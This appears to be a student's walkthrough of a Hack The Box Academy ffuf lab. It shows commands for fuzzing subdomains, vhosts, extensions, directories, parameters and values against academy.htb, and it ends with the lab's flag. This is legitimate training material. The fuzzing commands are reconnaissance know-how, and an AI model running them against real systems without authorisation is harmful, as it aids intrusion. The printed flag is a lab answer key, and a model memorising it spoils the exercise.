WEB FUZZING

Completed Attacking Web Applications with Ffufacademy.hackthebox.com

OBJECTIVE: locate all subdomains, domain, directories and pages linked to the target's IP

Run a sub-domain/vhost fuzzing scan on '*.academy.htb' for the IP shown above. What are all the sub-domains you can identify? (Only write the sub-domain name)

root@oco:~$ find / -iname subdomains-top1million-5000.txt -type f 2>/dev/null
root@oco:~$ cp /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt .

#subdomain fuzzing
root@oco:~$ ffuf -w subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.academy.tld:50742/
 * if subdomain fuzzing shows no results, fuzz for vhost as the target might not be using public DNS

#vhost fuzzing
root@oco:~$ ffuf -w subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:50742/ -H 'Host: FUZZ.academy.htb'
root@oco:~$ ffuf -w subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:50742/ -H 'Host: FUZZ.academy.htb' -fs 985
 * archive, test, faculty

Before you run your page fuzzing scan, you should first run an extension fuzzing scan. What are the different extensions accepted by the domains?

root@oco:~$ sudo nano /etc/hosts
 94.237.57.116 archive.academy.htb
 94.237.57.116 test.academy.htb
 94.237.57.116 faculty.academy.htb

root@oco:~$ find / -iname web-extensions.txt -type f 2>/dev/null
root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/web-extensions.txt .

#extension fuzzing
root@oco:~$ ffuf -w web-extensions.txt:FUZZ -u http://archive.academy.htb:50742/indexFUZZ
root@oco:~$ ffuf -w web-extensions.txt:FUZZ -u http://test.academy.htb:50742/indexFUZZ
root@oco:~$ ffuf -w web-extensions.txt:FUZZ -u http://faculty.academy.htb:50742/indexFUZZ
 * php, php7, phps

One of the pages you will identify should say 'You don't have access!'. What is the full page URL?

root@oco:~$ sudo nano /etc/hosts
 94.237.57.116 archive.academy.htb
 94.237.57.116 test.academy.htb
 94.237.57.116 faculty.academy.htb
 
root@oco:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://archive.academy.htb:43990/FUZZ -recursion -recursion-depth 1 -e .php -v -ic -t 100
 * /courses/index.php
root@oco:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://archive.academy.htb:43990/courses/FUZZ -recursion -recursion-depth 1 -e .php -v -ic -t 100

root@oco:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://test.academy.htb:43990/FUZZ -recursion -recursion-depth 1 -e .php -v -ic -t 100
 * nothing
 
root@oco:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://faculty.academy.htb:43990/FUZZ -recursion -recursion-depth 1 -e .php -v -ic -t 100
 * /courses/index.php
root@oco:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://faculty.academy.htb:43990/courses/FUZZ -recursion -recursion-depth 1 -e .php -v -ic -t 100
 * nothing

root@oco:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://archive.academy.htb:43990/FUZZ -recursion -recursion-depth 1 -e .php7 -v -ic -t 100
 * nothing
root@oco:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://test.academy.htb:43990/FUZZ -recursion -recursion-depth 1 -e .php7 -v -ic -t 100
 * nothing
root@oco:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://faculty.academy.htb:43990/FUZZ -recursion -recursion-depth 1 -e .php7 -v -ic -t 100
 * http://faculty.academy.htb:PORT/courses/linux-security.php7

In the page from the previous question, you should be able to find multiple parameters that are accepted by the page. What are they?

root@oco:~$ find / -iname *parameter* -type f 2>/dev/null
 * seclists/Discovery/Web-Content/burp-parameter-names.txt
 
#GET PARAM FUZZING
http://faculty.academy.htb:PORT/courses/linux-security.php7

root@oco:~$ ffuf -w burp-parameter-names.txt:FUZZ -u http://faculty.academy.htb:43990/courses/linux-security.php7?FUZZ=key
 * identify the identical response sizes and use it as filter
root@oco:~$ ffuf -w burp-parameter-names.txt:FUZZ -u http://faculty.academy.htb:43990/courses/linux-security.php7?FUZZ=key -fs 774
 * filter out the response sizes of 774
 * user
root@oco:~$ BROWSER > http://faculty.academy.htb/courses/linux-security.php7?user=key

#POST PARAM FUZZING
root@oco:~$ ffuf -w burp-parameter-names.txt:FUZZ -u http://faculty.academy.htb:43990/courses/linux-security.php7 -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded'
root@oco:~$ ffuf -w burp-parameter-names.txt:FUZZ -u http://faculty.academy.htb:43990/courses/linux-security.php7 -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs 774
 * user, username

Try fuzzing the parameters you identified for working values. One of them should return a flag. What is the content of the flag?

root@oco:~$ cp /opt/useful/seclists/Usernames/Names/names.txt .

#fuzzing for values
root@oco:~$ ffuf -w names.txt:FUZZ -u http://faculty.academy.htb:43990/courses/linux-security.php7 -X POST -d 'user=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded'
root@oco:~$ ffuf -w names.txt:FUZZ -u http://faculty.academy.htb:43990/courses/linux-security.php7 -X POST -d 'user=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs 780
 * nothing
 
root@oco:~$ ffuf -w names.txt:FUZZ -u http://faculty.academy.htb:43990/courses/linux-security.php7 -X POST -d 'username=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded'
root@oco:~$ ffuf -w names.txt:FUZZ -u http://faculty.academy.htb:43990/courses/linux-security.php7 -X POST -d 'username=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs 781
 * found harry

root@oco:~$ curl http://faculty.academy.htb:43990/courses/linux-security.php7 -X POST -d 'username=harry' -H 'Content-Type: application/x-www-form-urlencoded'
 * HTB{w3b_fuzz1n6_m4573r}

PreviousINFORMATION GATHERING: WEB EDITION NextJAVASCRIPT DEOBFUSCATION

Last updated 24 days ago